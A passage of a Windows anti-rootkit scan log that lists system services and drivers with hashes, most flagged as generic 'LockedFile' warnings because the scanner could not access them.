23:23:50.0820 0x18fc  GEARAspiWDM - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0820 0x18fc  GEARAspiWDM ( LockedFile.Multi.Generic ) - warning
23:23:50.0820 0x18fc  Force sending object to P2P due to detect: GEARAspiWDM
23:23:50.0820 0x18fc  Object send P2P result: false
23:23:50.0942 0x18fc  [ FE5AB4525BC2EC68B9119A6E5D40128B, 088DE37982CEE78A0C1181389A3BFF1E352DF504074B3E8F3EA244DB271BF216 ] gpsvc           C:\Windows\System32\gpsvc.dll
23:23:51.0144 0x18fc  gpsvc - ok
23:23:51.0254 0x18fc  [ E1B44A75947137F4143308D566889837, EC7E883E7AF38BF3AC0AC513CFDE0186038443E9ACC7AD616EE6BD0EC09AACB9 ] gupdate         C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
23:23:51.0264 0x18fc  gupdate - ok
23:23:51.0274 0x18fc  [ E1B44A75947137F4143308D566889837, EC7E883E7AF38BF3AC0AC513CFDE0186038443E9ACC7AD616EE6BD0EC09AACB9 ] gupdatem        C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
23:23:51.0274 0x18fc  gupdatem - ok
23:23:51.0380 0x18fc  [ 1E6438D4EA6E1174A3B3B1EDC4DE660B, F9995CFEC7BBFE10B06EEE04CA6B49658275C43096E57747BFF9C2C31A0F9011 ] hamachi         C:\Windows\system32\DRIVERS\hamachi.sys
23:23:51.0380 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\hamachi.sys. md5: 1E6438D4EA6E1174A3B3B1EDC4DE660B, sha256: F9995CFEC7BBFE10B06EEE04CA6B49658275C43096E57747BFF9C2C31A0F9011
23:23:51.0381 0x18fc  hamachi - detected LockedFile.Multi.Generic ( 1 )
23:23:51.0381 0x18fc  hamachi ( LockedFile.Multi.Generic ) - warning
23:23:51.0420 0x18fc  [ F2523EF6460FC42405B12248338AB2F0, B2F3DE8DE1F512D871BC2BC2E8D0E33AB03335BFBC07627C5F88B65024928E19 ] hcw85cir        C:\Windows\system32\drivers\hcw85cir.sys
23:23:51.0420 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\hcw85cir.sys. md5: F2523EF6460FC42405B12248338AB2F0, sha256: B2F3DE8DE1F512D871BC2BC2E8D0E33AB03335BFBC07627C5F88B65024928E19
23:23:51.0421 0x18fc  hcw85cir - detected LockedFile.Multi.Generic ( 1 )
23:23:51.0421 0x18fc  hcw85cir ( LockedFile.Multi.Generic ) - warning
23:23:51.0421 0x18fc  Force sending object to P2P due to detect: hcw85cir
23:23:51.0422 0x18fc  Object send P2P result: false
23:23:51.0476 0x18fc  [ 6410F6F415B2A5A9037224C41DA8BF12, 5B8452BC49FDA2215281D27B22FA9BE46B0460F51C4DC70E58B687CFB541F3A5 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
23:23:51.0476 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\HdAudio.sys. md5: 6410F6F415B2A5A9037224C41DA8BF12, sha256: 5B8452BC49FDA2215281D27B22FA9BE46B0460F51C4DC70E58B687CFB541F3A5
23:23:51.0476 0x18fc  HdAudAddService - detected LockedFile.Multi.Generic ( 1 )
23:23:51.0476 0x18fc  HdAudAddService ( LockedFile.Multi.Generic ) - warning
23:23:51.0536 0x18fc  [ 0A49913402747A0B67DE940FB42CBDBB, 61A45DBDCEB4A2D5C3C28F6BC8C5ADC51D0240A7553DF44BCC4355FC06F72B83 ] HDAudBus        C:\Windows\system32\DRIVERS\HDAudBus.sys
23:23:51.0536 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\HDAudBus.sys. md5: 0A49913402747A0B67DE940FB42CBDBB, sha256: 61A45DBDCEB4A2D5C3C28F6BC8C5ADC51D0240A7553DF44BCC4355FC06F72B83
23:23:51.0536 0x18fc  HDAudBus - detected LockedFile.Multi.Generic ( 1 )
23:23:51.0536 0x18fc  Object is SCO, delete is not allowed
23:23:51.0536 0x18fc  HDAudBus ( LockedFile.Multi.Generic ) - warning
23:23:51.0536 0x18fc  Force sending object to P2P due to detect: HDAudBus
23:23:51.0546 0x18fc  Object send P2P result: false
23:23:51.0546 0x18fc  [ 78E86380454A7B10A5EB255DC44A355F, 11F3ED7ACFFA3024B9BD504F81AC39F5B4CED5A8A425E8BADF7132EFEDB9BD64 ] HidBatt         C:\Windows\system32\DRIVERS\HidBatt.sys
23:23:51.0546 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\HidBatt.sys. md5: 78E86380454A7B10A5EB255DC44A355F, sha256: 11F3ED7ACFFA3024B9BD504F81AC39F5B4CED5A8A425E8BADF7132EFEDB9BD64
23:23:51.0546 0x18fc  HidBatt - detected LockedFile.Multi.Generic ( 1 )
23:23:51.0546 0x18fc  HidBatt ( LockedFile.Multi.Generic ) - warning
23:23:51.0546 0x18fc  Force sending object to P2P due to detect: HidBatt
23:23:51.0546 0x18fc  Object send P2P result: false
23:23:51.0576 0x18fc  [ 7FD2A313F7AFE5C4DAB14798C48DD104, 94CBFD4506CBDE4162CEB3367BAB042D19ACA6785954DC0B554D4164B9FCD0D4 ] HidBth          C:\Windows\system32\DRIVERS\hidbth.sys
23:23:51.0576 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\hidbth.sys. md5: 7FD2A313F7AFE5C4DAB14798C48DD104, sha256: 94CBFD4506CBDE4162CEB3367BAB042D19ACA6785954DC0B554D4164B9FCD0D4
23:23:51.0576 0x18fc  HidBth - detected LockedFile.Multi.Generic ( 1 )
23:23:51.0576 0x18fc  Object is SCO, delete is not allowed
23:23:51.0576 0x18fc  HidBth ( LockedFile.Multi.Generic ) - warning
23:23:51.0576 0x18fc  Force sending object to P2P due to detect: HidBth
23:23:51.0576 0x18fc  Object send P2P result: false
23:23:51.0596 0x18fc  [ 0A77D29F311B88CFAE3B13F9C1A73825, 8615DC6CEFB591505CE16E054A71A4F371B827DDFD5E980777AB4233DCFDA01D ] HidIr           C:\Windows\system32\DRIVERS\hidir.sys
23:23:51.0596 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\hidir.sys. md5: 0A77D29F311B88CFAE3B13F9C1A73825, sha256: 8615DC6CEFB591505CE16E054A71A4F371B827DDFD5E980777AB4233DCFDA01D
23:23:51.0596 0x18fc  HidIr - detected LockedFile.Multi.Generic ( 1 )
23:23:51.0596 0x18fc  Object is SCO, delete is not allowed
23:23:51.0596 0x18fc  HidIr ( LockedFile.Multi.Generic ) - warning
23:23:51.0596 0x18fc  Force sending object to P2P due to detect: HidIr
23:23:51.0596 0x18fc  Object send P2P result: false
23:23:51.0648 0x18fc  [ BD9EB3958F213F96B97B1D897DEE006D, 4D01CBF898B528B3A4E5A683DF2177300AFABD7D4CB51F1A7891B1B545499631 ] hidserv         C:\Windows\system32\hidserv.dll
23:23:51.0688 0x18fc  hidserv - ok
23:23:51.0761 0x18fc  [ B3BF6B5B50006DEF50B66306D99FCF6F, D39A1DEBE7C464922919826D15199ED25E263BF58633593DD412D78F98921417 ] HidUsb          C:\Windows\system32\DRIVERS\hidusb.sys
23:23:51.0761 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\hidusb.sys. md5: B3BF6B5B50006DEF50B66306D99FCF6F, sha256: D39A1DEBE7C464922919826D15199ED25E263BF58633593DD412D78F98921417
23:23:51.0762 0x18fc  HidUsb - detected LockedFile.Multi.Generic ( 1 )
23:23:51.0762 0x18fc  Object is SCO, delete is not allowed
23:23:51.0762 0x18fc  HidUsb ( LockedFile.Multi.Generic ) - warning
23:23:51.0890 0x18fc  [ 492572D5C65636F598739552EBA3D3C1, 866C4683007E0DA2AD2B219A80B6EF34EE6972F8B5A248605AB39F735F0FF6DC ] HiPatchService  C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
23:23:51.0900 0x18fc  HiPatchService - detected UnsignedFile.Multi.Generic ( 1 )
23:23:51.0900 0x18fc  HiPatchService ( UnsignedFile.Multi.Generic ) - warning
23:23:51.0990 0x18fc  [ EFA58EDE58DD74388FFD04CB32681518, 76D81F9BC1A4D85A779B79DEC23B79F1568AA236CD49247414093CDC1FCC150F ] hkmsvc          C:\Windows\system32\kmsvc.dll
23:23:52.0102 0x18fc  hkmsvc - ok
23:23:52.0175 0x18fc  [ 046B2673767CA626E2CFB7FDF735E9E8, 9C932DCC5DE9B1919AB38C01D76AD7BBAF491DE6D158662407974748BC0B4C6C ] HomeGroupListener C:\Windows\system32\ListSvc.dll
23:23:52.0234 0x18fc  HomeGroupListener - ok
23:23:52.0299 0x18fc  [ 06A7422224D9865A5613710A089987DF, EF604B4B6918D3FDC8E90ED9004E6E7340E0F399C214C65CCE3A7C8C576FA1C0 ] HomeGroupProvider C:\Windows\system32\provsvc.dll
23:23:52.0338 0x18fc  HomeGroupProvider - ok
23:23:52.0374 0x18fc  [ 0886D440058F203EBA0E1825E4355914, BC49C4CEFE324A08C864A4BF4FEA9A70151FAB7CC30BDC28344F3FFD2F500070 ] HpSAMD          C:\Windows\system32\DRIVERS\HpSAMD.sys
23:23:52.0374 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\HpSAMD.sys. md5: 0886D440058F203EBA0E1825E4355914, sha256: BC49C4CEFE324A08C864A4BF4FEA9A70151FAB7CC30BDC28344F3FFD2F500070
23:23:52.0375 0x18fc  HpSAMD - detected LockedFile.Multi.Generic ( 1 )
23:23:52.0375 0x18fc  HpSAMD ( LockedFile.Multi.Generic ) - warning
23:23:52.0375 0x18fc  Force sending object to P2P due to detect: HpSAMD
23:23:52.0376 0x18fc  Object send P2P result: false
23:23:52.0658 0x18fc  [ CEE049CAC4EFA7F4E1E4AD014414A5D4, 433AE2D845850F1D7A48275BBD87B3F0E7DD48F2282C727C4B777ECD92CC331D ] HTTP            C:\Windows\system32\drivers\HTTP.sys
23:23:52.0658 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\HTTP.sys. md5: CEE049CAC4EFA7F4E1E4AD014414A5D4, sha256: 433AE2D845850F1D7A48275BBD87B3F0E7DD48F2282C727C4B777ECD92CC331D
23:23:52.0658 0x18fc  HTTP - detected LockedFile.Multi.Generic ( 1 )
23:23:52.0658 0x18fc  Object is SCO, delete is not allowed
23:23:52.0658 0x18fc  HTTP ( LockedFile.Multi.Generic ) - warning
23:23:52.0708 0x18fc  [ F17766A19145F111856378DF337A5D79, FC1633FB865A5324EBCBE5F97D297B899FABBDD965D862C2EFC743CD36F47E62 ] hwpolicy        C:\Windows\system32\drivers\hwpolicy.sys
23:23:52.0708 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\hwpolicy.sys. md5: F17766A19145F111856378DF337A5D79, sha256: FC1633FB865A5324EBCBE5F97D297B899FABBDD965D862C2EFC743CD36F47E62
23:23:52.0708 0x18fc  hwpolicy - detected LockedFile.Multi.Generic ( 1 )
23:23:52.0708 0x18fc  hwpolicy ( LockedFile.Multi.Generic ) - warning
23:23:52.0738 0x18fc  [ FA55C73D4AFFA7EE23AC4BE53B4592D3, 65CDDC62B89A60E942C5642C9D8B539EFB69DA8069B4A2E54978154B314531CD ] i8042prt        C:\Windows\system32\DRIVERS\i8042prt.sys
23:23:52.0738 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\i8042prt.sys. md5: FA55C73D4AFFA7EE23AC4BE53B4592D3, sha256: 65CDDC62B89A60E942C5642C9D8B539EFB69DA8069B4A2E54978154B314531CD
23:23:52.0738 0x18fc  i8042prt - detected LockedFile.Multi.Generic ( 1 )
23:23:52.0738 0x18fc  Object is SCO, delete is not allowed
23:23:52.0738 0x18fc  i8042prt ( LockedFile.Multi.Generic ) - warning
23:23:52.0768 0x18fc  [ D83EFB6FD45DF9D55E9A1AFC63640D50, 0494F8F7CB3ED11FD8D0B838CB71271AF7A3CBFCB7F2CB043A9392B5106A3C7B ] iaStorV         C:\Windows\system32\DRIVERS\iaStorV.sys
23:23:52.0768 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\iaStorV.sys. md5: D83EFB6FD45DF9D55E9A1AFC63640D50, sha256: 0494F8F7CB3ED11FD8D0B838CB71271AF7A3CBFCB7F2CB043A9392B5106A3C7B
23:23:52.0768 0x18fc  iaStorV - detected LockedFile.Multi.Generic ( 1 )
23:23:52.0778 0x18fc  Object is SCO, delete is not allowed
23:23:52.0778 0x18fc  iaStorV ( LockedFile.Multi.Generic ) - warning
23:23:52.0778 0x18fc  Force sending object to P2P due to detect: iaStorV
23:23:52.0788 0x18fc  Object send P2P result: false
23:23:53.0170 0x18fc  [ 2F2BE70D3E02B6FA877921AB9516D43C, E04255EE4BD95FC1539EB1EB9F702B039F65993D31A4531DA487274543EF5226 ] idsvc           C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\infocard.exe
23:23:53.0230 0x18fc  idsvc - ok
23:23:53.0250 0x18fc  [ 5C18831C61933628F5BB0EA2675B9D21, 5CD9DE2F8C0256623A417B5C55BF55BB2562BD7AB2C3C83BB3D9886C2FBDA4E4 ] iirsp           C:\Windows\system32\DRIVERS\iirsp.sys
23:23:53.0260 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\iirsp.sys. md5: 5C18831C61933628F5BB0EA2675B9D21, sha256: 5CD9DE2F8C0256623A417B5C55BF55BB2562BD7AB2C3C83BB3D9886C2FBDA4E4
23:23:53.0260 0x18fc  iirsp - detected LockedFile.Multi.Generic ( 1 )
23:23:53.0260 0x18fc  Object is SCO, delete is not allowed
23:23:53.0260 0x18fc  iirsp ( LockedFile.Multi.Generic ) - warning
23:23:53.0605 0x18fc  [ C5B4683680DF085B57BC53E5EF34861F, 9C06517DFCB3ED7BB1166F7EB6CCC8713E6B68283C75420C0EDC182094AA1B8F ] IKEEXT          C:\Windows\System32\ikeext.dll
23:23:53.0705 0x18fc  IKEEXT - ok
23:23:54.0376 0x18fc  [ CCEDD47ABD068C58C8513DEB785093BB, 2B5571688655265037ACB44D2F2E0CD646EC0567D823C32CA09F13A1814C241B ] IntcAzAudAddService C:\Windows\system32\drivers\RTKVHD64.sys
23:23:54.0386 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\RTKVHD64.sys. md5: CCEDD47ABD068C58C8513DEB785093BB, sha256: 2B5571688655265037ACB44D2F2E0CD646EC0567D823C32CA09F13A1814C241B
23:23:54.0393 0x18fc  IntcAzAudAddService - detected LockedFile.Multi.Generic ( 1 )
23:23:54.0393 0x18fc  IntcAzAudAddService ( LockedFile.Multi.Generic ) - warning
23:23:54.0393 0x18fc  Force sending object to P2P due to detect: IntcAzAudAddService
23:23:54.0405 0x18fc  Object send P2P result: false
23:23:54.0449 0x18fc  [ F00F20E70C6EC3AA366910083A0518AA, E2F3E9FFD82C802C8BAC309893A3664ACF16A279959C0FDECCA64C3D3C60FD22 ] intelide        C:\Windows\system32\DRIVERS\intelide.sys
23:23:54.0449 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\intelide.sys. md5: F00F20E70C6EC3AA366910083A0518AA, sha256: E2F3E9FFD82C802C8BAC309893A3664ACF16A279959C0FDECCA64C3D3C60FD22
23:23:54.0449 0x18fc  intelide - detected LockedFile.Multi.Generic ( 1 )
23:23:54.0450 0x18fc  Object is SCO, delete is not allowed
23:23:54.0450 0x18fc  intelide ( LockedFile.Multi.Generic ) - warning
23:23:54.0450 0x18fc  Force sending object to P2P due to detect: intelide
23:23:54.0451 0x18fc  Object send P2P result: false
23:23:54.0518 0x18fc  [ ADA036632C664CAA754079041CF1F8C1, F2386CC09AC6DE4C54189154F7D91C1DB7AA120B13FAE8BA5B579ACF99FCC610 ] intelppm        C:\Windows\system32\DRIVERS\intelppm.sys
23:23:54.0518 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\intelppm.sys. md5: ADA036632C664CAA754079041CF1F8C1, sha256: F2386CC09AC6DE4C54189154F7D91C1DB7AA120B13FAE8BA5B579ACF99FCC610
23:23:54.0518 0x18fc  intelppm - detected LockedFile.Multi.Generic ( 1 )
23:23:54.0518 0x18fc  Object is SCO, delete is not allowed
23:23:54.0518 0x18fc  intelppm ( LockedFile.Multi.Generic ) - warning
23:23:54.0640 0x18fc  [ 098A91C54546A3B878DAD6A7E90A455B, 044CCE2A0DF56EBE1EFD99B4F6F0A5B9EE12498CA358CF4B2E3A1CFD872823AA ] IPBusEnum       C:\Windows\system32\ipbusenum.dll
23:23:54.0670 0x18fc  IPBusEnum - ok
23:23:54.0740 0x18fc  [ 722DD294DF62483CECAAE6E094B4D695, 41ABB42EF969EA8A84B546908EBBDC2411D964DE101CE6DD3D7ECF109085E0C0 ] IpFilterDriver  C:\Windows\system32\DRIVERS\ipfltdrv.sys
23:23:54.0740 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\ipfltdrv.sys. md5: 722DD294DF62483CECAAE6E094B4D695, sha256: 41ABB42EF969EA8A84B546908EBBDC2411D964DE101CE6DD3D7ECF109085E0C0
23:23:54.0740 0x18fc  IpFilterDriver - detected LockedFile.Multi.Generic ( 1 )
23:23:54.0740 0x18fc  Object is SCO, delete is not allowed
23:23:54.0740 0x18fc  IpFilterDriver ( LockedFile.Multi.Generic ) - warning
23:23:54.0970 0x18fc  [ F8E058D17363EC580E4B7232778B6CB5, 02352919F349C57930A0B032FBDC45327FB473D310DE7AC721F4694FDE7D21FB ] iphlpsvc        C:\Windows\System32\iphlpsvc.dll
23:23:55.0092 0x18fc  iphlpsvc - ok
23:23:55.0132 0x18fc  [ E2B4A4494DB7CB9B89B55CA268C337C5, C59BC4AA03D10647641EC7533F78BC7E2EA6FC48B8B2CF1A49B5148EF40A90FB ] IPMIDRV         C:\Windows\system32\DRIVERS\IPMIDrv.sys
23:23:55.0132 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\IPMIDrv.sys. md5: E2B4A4494DB7CB9B89B55CA268C337C5, sha256: C59BC4AA03D10647641EC7533F78BC7E2EA6FC48B8B2CF1A49B5148EF40A90FB
23:23:55.0132 0x18fc  IPMIDRV - detected LockedFile.Multi.Generic ( 1 )
23:23:55.0132 0x18fc  Object is SCO, delete is not allowed
23:23:55.0132 0x18fc  IPMIDRV ( LockedFile.Multi.Generic ) - warning
23:23:55.0192 0x18fc  [ AF9B39A7E7B6CAA203B3862582E9F2D0, 67128BE7EADBE6BD0205B050F96E268948E8660C4BAB259FB0BE03935153D04E ] IPNAT           C:\Windows\system32\drivers\ipnat.sys
23:23:55.0192 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\ipnat.sys. md5: AF9B39A7E7B6CAA203B3862582E9F2D0, sha256: 67128BE7EADBE6BD0205B050F96E268948E8660C4BAB259FB0BE03935153D04E
23:23:55.0192 0x18fc  IPNAT - detected LockedFile.Multi.Generic ( 1 )
23:23:55.0202 0x18fc  Object is SCO, delete is not allowed
23:23:55.0202 0x18fc  IPNAT ( LockedFile.Multi.Generic ) - warning
23:23:55.0462 0x18fc  [ E61BB95A7CB49696D25A0C4EBD108156, 65D95A0DBC408AD18D5E344A5E875551E6CC044038DE438E4EA1102A234FC529 ] iPod Service    C:\Program Files\iPod\bin\iPodService.exe
23:23:55.0482 0x18fc  iPod Service - ok
23:23:55.0513 0x18fc  [ 05360B1EA5A2ABF620D1D96EBD8BD8F1, 226185C9ED1F6367BE4937734FF528D1EAAC1F0F85E4735EE66B244C15FC8EAF ] irda            C:\Windows\system32\DRIVERS\irda.sys
23:23:55.0513 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\irda.sys. md5: 05360B1EA5A2ABF620D1D96EBD8BD8F1, sha256: 226185C9ED1F6367BE4937734FF528D1EAAC1F0F85E4735EE66B244C15FC8EAF
23:23:55.0530 0x18fc  irda - detected LockedFile.Multi.Generic ( 1 )
23:23:55.0530 0x18fc  Object is SCO, delete is not allowed
23:23:55.0530 0x18fc  irda ( LockedFile.Multi.Generic ) - warning
23:23:55.0555 0x18fc  [ 3ABF5E7213EB28966D55D58B515D5CE9, A352BCC5B6B9A28805B15CAFB235676F1FAFF0D2394F88C03089EB157D6188AE ] IRENUM          C:\Windows\system32\drivers\irenum.sys
23:23:55.0555 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\irenum.sys. md5: 3ABF5E7213EB28966D55D58B515D5CE9, sha256: A352BCC5B6B9A28805B15CAFB235676F1FAFF0D2394F88C03089EB157D6188AE
23:23:55.0556 0x18fc  IRENUM - detected LockedFile.Multi.Generic ( 1 )
23:23:55.0556 0x18fc  Object is SCO, delete is not allowed
23:23:55.0556 0x18fc  IRENUM ( LockedFile.Multi.Generic ) - warning
23:23:55.0556 0x18fc  Force sending object to P2P due to detect: IRENUM
23:23:55.0557 0x18fc  Object send P2P result: false
23:23:55.0605 0x18fc  [ 3848384AB383F0A8F506C4370635C1F9, A18BAAAD42CFC5B33D8108875D1FC1A424351B6901798E7B2A5EB82C4C0F89AC ] Irmon           C:\Windows\System32\irmon.dll
23:23:55.0634 0x18fc  Irmon - ok
23:23:55.0712 0x18fc  [ D2CA12736624BA636F8357DC3EF0757E, FAB25CEF4153997A0D24788B478CE44E058E51E630ED9DA181FF8C51D05512DC ] irsir           C:\Windows\system32\DRIVERS\irsir.sys
23:23:55.0712 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\irsir.sys. md5: D2CA12736624BA636F8357DC3EF0757E, sha256: FAB25CEF4153997A0D24788B478CE44E058E51E630ED9DA181FF8C51D05512DC
23:23:55.0712 0x18fc  irsir - detected LockedFile.Multi.Generic ( 1 )
23:23:55.0713 0x18fc  irsir ( LockedFile.Multi.Generic ) - warning
23:23:55.0713 0x18fc  Force sending object to P2P due to detect: irsir
23:23:55.0714 0x18fc  Object send P2P result: false
23:23:55.0731 0x18fc  [ 2F7B28DC3E1183E5EB418DF55C204F38, D40410A760965925D6F10959B2043F7BD4F68EAFCF5E743AF11AD860BD136548 ] isapnp          C:\Windows\system32\DRIVERS\isapnp.sys
23:23:55.0732 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\isapnp.sys. md5: 2F7B28DC3E1183E5EB418DF55C204F38, sha256: D40410A760965925D6F10959B2043F7BD4F68EAFCF5E743AF11AD860BD136548
23:23:55.0732 0x18fc  isapnp - detected LockedFile.Multi.Generic ( 1 )
23:23:55.0732 0x18fc  Object is SCO, delete is not allowed
23:23:55.0732 0x18fc  isapnp ( LockedFile.Multi.Generic ) - warning
23:23:55.0754 0x18fc  [ FA4D2557DE56D45B0A346F93564BE6E1, 2827EC3582FF59FFD55BBD4A4F0DDFFEAD4F2537FA043B3A69904FE920B1619C ] iScsiPrt        C:\Windows\system32\DRIVERS\msiscsi.sys
23:23:55.0754 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\msiscsi.sys. md5: FA4D2557DE56D45B0A346F93564BE6E1, sha256: 2827EC3582FF59FFD55BBD4A4F0DDFFEAD4F2537FA043B3A69904FE920B1619C
23:23:55.0754 0x18fc  iScsiPrt - detected LockedFile.Multi.Generic ( 1 )
23:23:55.0754 0x18fc  Object is SCO, delete is not allowed
23:23:55.0754 0x18fc  iScsiPrt ( LockedFile.Multi.Generic ) - warning
23:23:55.0793 0x18fc  [ BC02336F1CBA7DCC7D1213BB588A68A5, 450C5BAD54CCE2AFCDFF1B6E7F8E1A8446D9D3255DF9D36C29A8F848048AAD93 ] kbdclass        C:\Windows\system32\DRIVERS\kbdclass.sys
23:23:55.0793 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\kbdclass.sys. md5: BC02336F1CBA7DCC7D1213BB588A68A5, sha256: 450C5BAD54CCE2AFCDFF1B6E7F8E1A8446D9D3255DF9D36C29A8F848048AAD93
23:23:55.0794 0x18fc  kbdclass - detected LockedFile.Multi.Generic ( 1 )
23:23:55.0794 0x18fc  Object is SCO, delete is not allowed
23:23:55.0794 0x18fc  kbdclass ( LockedFile.Multi.Generic ) - warning
23:23:55.0794 0x18fc  Force sending object to P2P due to detect: kbdclass
23:23:55.0795 0x18fc  Object send P2P result: false
23:23:55.0813 0x18fc  [ 6DEF98F8541E1B5DCEB2C822A11F7323, F6EE4A7A6A7A1F243D32CA9241CA4816C92EB7BF2AADDD09234968C2CAAE6C0D ] kbdhid          C:\Windows\system32\DRIVERS\kbdhid.sys
23:23:55.0813 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\kbdhid.sys. md5: 6DEF98F8541E1B5DCEB2C822A11F7323, sha256: F6EE4A7A6A7A1F243D32CA9241CA4816C92EB7BF2AADDD09234968C2CAAE6C0D
23:23:55.0814 0x18fc  kbdhid - detected LockedFile.Multi.Generic ( 1 )
23:23:55.0814 0x18fc  Object is SCO, delete is not allowed
23:23:55.0814 0x18fc  kbdhid ( LockedFile.Multi.Generic ) - warning
23:23:55.0814 0x18fc  Force sending object to P2P due to detect: kbdhid
23:23:55.0815 0x18fc  Object send P2P result: false
23:23:55.0863 0x18fc  [ 0793F40B9B8A1BDD266296409DBD91EA, 8A383FC9A66A327905C340D06138980F9E489479535A2C2AAE5E8BB14A74826E ] KeyIso          C:\Windows\system32\lsass.exe
23:23:55.0866 0x18fc  KeyIso - ok
23:23:55.0906 0x18fc  [ E8B6FCC9C83535C67F835D407620BD27, 74B63F3BFB756FF0B0AD6A6C1535C0A1A0630295ECCBC078B00F2449718B0870 ] KSecDD          C:\Windows\system32\Drivers\ksecdd.sys
23:23:55.0906 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\Drivers\ksecdd.sys. md5: E8B6FCC9C83535C67F835D407620BD27, sha256: 74B63F3BFB756FF0B0AD6A6C1535C0A1A0630295ECCBC078B00F2449718B0870
23:23:55.0906 0x18fc  KSecDD - detected LockedFile.Multi.Generic ( 1 )
23:23:55.0906 0x18fc  Object is SCO, delete is not allowed
23:23:55.0906 0x18fc  KSecDD ( LockedFile.Multi.Generic ) - warning
23:23:55.0906 0x18fc  Force sending object to P2P due to detect: KSecDD
23:23:55.0906 0x18fc  Object send P2P result: false
23:23:55.0936 0x18fc  [ A8C63880EF6F4D3FEC7B616B9C060215, 036AE3ABBF991F5748C5C46E1DF62FBBC832BCDBF8C1B6E3C22A22A3703BBBCA ] KSecPkg         C:\Windows\system32\Drivers\ksecpkg.sys
23:23:55.0936 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\Drivers\ksecpkg.sys. md5: A8C63880EF6F4D3FEC7B616B9C060215, sha256: 036AE3ABBF991F5748C5C46E1DF62FBBC832BCDBF8C1B6E3C22A22A3703BBBCA
23:23:55.0936 0x18fc  KSecPkg - detected LockedFile.Multi.Generic ( 1 )
23:23:55.0936 0x18fc  KSecPkg ( LockedFile.Multi.Generic ) - warning
23:23:55.0936 0x18fc  Force sending object to P2P due to detect: KSecPkg
23:23:55.0946 0x18fc  Object send P2P result: false
23:23:55.0966 0x18fc  [ 6869281E78CB31A43E969F06B57347C4, 866A23E69B32A78D378D6CB3B3DA3695FFDFF0FEC3C9F68C8C3F988DF417044B ] ksthunk         C:\Windows\system32\drivers\ksthunk.sys
23:23:55.0966 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\ksthunk.sys. md5: 6869281E78CB31A43E969F06B57347C4, sha256: 866A23E69B32A78D378D6CB3B3DA3695FFDFF0FEC3C9F68C8C3F988DF417044B
23:23:55.0966 0x18fc  ksthunk - detected LockedFile.Multi.Generic ( 1 )
23:23:55.0966 0x18fc  ksthunk ( LockedFile.Multi.Generic ) - warning
23:23:56.0068 0x18fc  [ 6AB66E16AA859232F64DEB66887A8C9C, 5F2B579BEA8098A2994B0DECECDAE7B396E7B5DC5F09645737B9F28BEEA77FFF ] KtmRm           C:\Windows\system32\msdtckrm.dll
23:23:56.0140 0x18fc  KtmRm - ok
23:23:56.0215 0x18fc  [ 7867CACBF7B23AD04F5D18657BF15FA2, 153763A0C4A347526BCC2A502B5B0BC323AEC4035F1D7A8C85479FEDA0AD8A0C ] L1C             C:\Windows\system32\DRIVERS\L1C62x64.sys
23:23:56.0215 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\L1C62x64.sys. md5: 7867CACBF7B23AD04F5D18657BF15FA2, sha256: 153763A0C4A347526BCC2A502B5B0BC323AEC4035F1D7A8C85479FEDA0AD8A0C
23:23:56.0216 0x18fc  L1C - detected LockedFile.Multi.Generic ( 1 )
23:23:56.0216 0x18fc  L1C ( LockedFile.Multi.Generic ) - warning
23:23:56.0290 0x18fc  [ C926920B8978DE6ACFE9E15C709E9B57, 33B8002ABC30372B1CA8B6EC046757794CD7C9DA3CA4715B515B6894DC7E45CA ] LanmanServer    C:\Windows\system32\srvsvc.dll
23:23:56.0374 0x18fc  LanmanServer - ok
23:23:56.0430 0x18fc  [ 27026EAC8818E8A6C00A1CAD2F11D29A, A12858CCB3B2419D66C667A46B106DA7A7BA97FFFA9634BFAE95DDF193C430D5 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
23:23:56.0470 0x18fc  LanmanWorkstation - ok
23:23:56.0516 0x18fc  [ 1538831CF8AD2979A04C423779465827, E1729B0CC4CEEE494A0B8817A8E98FF232E3A32FB023566EF0BC71A090262C0C ] lltdio          C:\Windows\system32\DRIVERS\lltdio.sys
23:23:56.0516 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\lltdio.sys. md5: 1538831CF8AD2979A04C423779465827, sha256: E1729B0CC4CEEE494A0B8817A8E98FF232E3A32FB023566EF0BC71A090262C0C
